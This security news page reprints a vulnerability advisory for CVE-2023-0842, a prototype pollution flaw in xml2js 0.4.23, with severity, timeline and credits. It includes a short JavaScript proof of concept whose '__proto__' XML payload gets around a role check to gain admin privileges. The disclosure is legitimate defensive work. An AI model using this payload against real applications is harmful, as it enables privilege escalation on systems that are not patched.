Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-0842: xml2js 0.4.23 - Prototype Pollution | Advisories | Fluid Attacks

xml2js version 0.4.23 allows an external attacker to edit or add new properties to an object. This is possible because the application does not properly validate incoming JSON keys, thus allowing the proto property to be edited.

CVE
#vulnerability#linux#js#git#java#perl#pdf#auth
  1. Myers

Summary

Name

xml2js 0.4.23 - Prototype Pollution

Code name

Myers

Product

mdpdf

Affected versions

Version 0.4.23

State

Public

Release date

2023-04-10

Vulnerability

Kind

Prototype Pollution

Rule

390. Prototype Pollution

Remote

Yes

CVSSv3 Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

CVSSv3 Base Score

7.3

Exploit available

Yes

CVE ID(s)

CVE-2023-0842

Description

xml2js version 0.4.23 allows an external attacker to edit or add new properties to an object. This is possible because the application does not properly validate incoming JSON keys, thus allowing the proto property to be edited.

Vulnerability

Prototype pollution is a vulnerability that affects JS. It occurs when a third party manages to modify the proto of an object. JavaScript first checks if such a method/attribute exists in the object. If so, then it calls it. If not, it looks in the object’s prototype. If the method/attribute is also not in the object’s prototype, then the property is said to be undefined.

Therefore, if an attacker succeeds in injecting the proto property into an object, he will succeed in injecting or editing its properties.

Exploitation****Exploit.md

var parseString = require('xml2js').parseString;

let normal_user_request    = "<role>admin</role>";
let malicious_user_request = "<__proto__><role>admin</role></__proto__>";

const update_user = (userProp) => {
    // A user cannot alter his role. This way we prevent privilege escalations.
    parseString(userProp, function (err, user) {
        if(user.hasOwnProperty("role") && user?.role.toLowerCase() === "admin") {
            console.log("Unauthorized Action");
        } else {
            console.log(user?.role[0]);
        }
    });
}

update_user(normal_user_request);
update_user(malicious_user_request);

Evidence of exploitation

Our security policy

We have reserved the ID CVE-2023-0842 to refer to this issue from now on.

  • https://fluidattacks.com/advisories/policy/

System Information

  • Version: xml2js 0.4.23

  • Operating System: GNU/Linux

Mitigation

There is currently no patch available for this vulnerability.

Credits

The vulnerability was discovered by Carlos Bello from Fluid Attacks’ Offensive Team.

References

Vendor page https://github.com/Leonidas-from-XIV/node-xml2js/

Timeline

2023-02-14

Vulnerability discovered.

2023-02-14

Vendor contacted.

2023-02-14

Vendor replied acknowledging the report.

2023-04-10

Public Disclosure.

Related news

CVE-2023-28955: Security Bulletin: Multiple security vulnerabilities affecting Watson Knowledge Catalog for IBM Cloud Pak for Data

IBM Watson Knowledge Catalog on Cloud Pak for Data 4.0 could allow an authenticated user send a specially crafted request that could cause a denial of service. IBM X-Force ID: 251704.

GHSA-776f-qx25-q3cc: xml2js is vulnerable to prototype pollution

xml2js version 0.4.23 allows an external attacker to edit or add new properties to an object. This is possible because the application does not properly validate incoming JSON keys, thus allowing the `__proto__` property to be edited.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907